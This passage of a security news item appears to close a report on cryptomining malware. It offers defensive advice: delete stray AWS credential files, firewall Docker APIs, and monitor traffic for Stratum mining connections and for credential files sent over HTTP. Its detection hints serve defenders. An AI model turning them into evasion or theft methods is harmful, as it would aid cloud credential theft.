• Identify the systems that store AWS credential files, and then delete them if they’re not needed. It is common for development credentials to accidentally be left on production systems.
  • To limit access to Docker APIs, use firewall rules. We recommend that you use a whitelisted approach to your firewall ruleset.
  • Check network traffic for connections to mining pools or use the Stratum mining protocol.
  • Check any connections that send the AWS Credentials File over HTTP.

Cado also credited other security research efforts against the cryptominers, such as Trend Micro, Malware Hunter Team, and r3dbU7z.